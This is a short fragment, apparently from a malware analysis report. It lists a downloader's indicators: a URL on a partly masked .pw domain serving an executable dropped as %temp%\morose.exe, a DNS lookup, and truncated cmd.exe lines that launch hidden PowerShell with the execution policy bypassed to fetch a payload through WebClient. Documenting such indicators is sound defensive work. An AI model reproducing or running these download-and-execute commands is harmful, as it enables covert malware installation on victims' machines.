Technical Information
- http://w2###pbza0zj.pw/blog/wnx0bykhutp2.exe as %temp%\morose.exe
- '<SYSTEM32>\cmd.exe' /c cd PlatonismBetsypiloerectionexpatiatenurtureChaobullymalfunctionfallible & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).Downl...
- DNS ASK w2###pbza0zj.pw
- '<SYSTEM32>\cmd.exe' /c cd PlatonismBetsypiloerectionexpatiatenurtureChaobullymalfunctionfallible & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).Downl...' (with hidden window)